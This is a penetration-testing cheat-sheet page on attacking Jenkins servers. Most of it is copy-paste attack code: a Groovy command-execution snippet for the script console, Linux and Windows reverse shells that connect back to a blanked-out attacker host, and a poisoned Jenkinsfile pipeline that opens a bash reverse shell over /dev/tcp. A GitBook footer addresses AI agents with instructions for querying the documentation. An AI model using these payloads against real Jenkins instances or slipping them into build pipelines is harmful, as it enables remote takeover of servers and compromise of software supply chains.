> For the complete documentation index, see [llms.txt](https://ivalexev.gitbook.io/rednote/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ivalexev.gitbook.io/rednote/pentesting-process/other/jenkins.md). # Jenkins Jenkins is an open-source automation server written in Java that helps developers build and test their software projects continuously. It is a server-based system that runs in servlet containers such as Tomcat. ## Attacks ### Jenkins Application Once we have gained access to a Jenkins application, a quick way of achieving command execution on the underlying server is via the Script Console (`/script`). The script console allows us to run arbitrary Apache Groovy scripts within the Jenkins controller runtime. Groovy is an object-oriented Java-compatible language. Groovy source code gets compiled into Java Bytecode and can run on any platform that has JRE installed. {% code title="WebShell" overflow="wrap" %} ```groovy def cmd = 'id' def sout = new StringBuffer(), serr = new StringBuffer() def proc = cmd.execute() proc.consumeProcessOutput(sout, serr) proc.waitForOrKill(1000) println sout ``` {% endcode %} {% code title="LinuxRevShell" overflow="wrap" %} ```groovy r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp//;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() ``` {% endcode %} {% code title="WindowsRevShell" overflow="wrap" %} ```groovy String host=""; int port=; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); ``` {% endcode %} ### Poisoning the Pipeline Even though we can modify the `jenkinsfile` (for example, in a git repository), we need to check how to start the build. Jenkins might be configured to only run on manual intervention; if this is the case, we need to keep exploring. It might also be configured to routinely execute the pipeline. In such a scenario, we won't know how to trigger it until it executes. However, Jenkins might also be configured to run the build on each change to the repo. This is typically done by having the SCM server call a *`webhook`* for specific triggers. We can check in the settings whether the repository contains any configurations that will execute a pipeline on certain actions. {% code overflow="wrap" %} ```ts pipeline { agent any stages { stage('Build') { steps { // withAWS(region: 'us-east-1', credentials: 'aws_key') { // AWS in env script { if (isUnix()) { // sh 'bash -c "bash -i >& /dev/tcp// 0>&1" & ' } } // } } } } } ``` {% endcode %} --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://ivalexev.gitbook.io/rednote/pentesting-process/other/jenkins.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.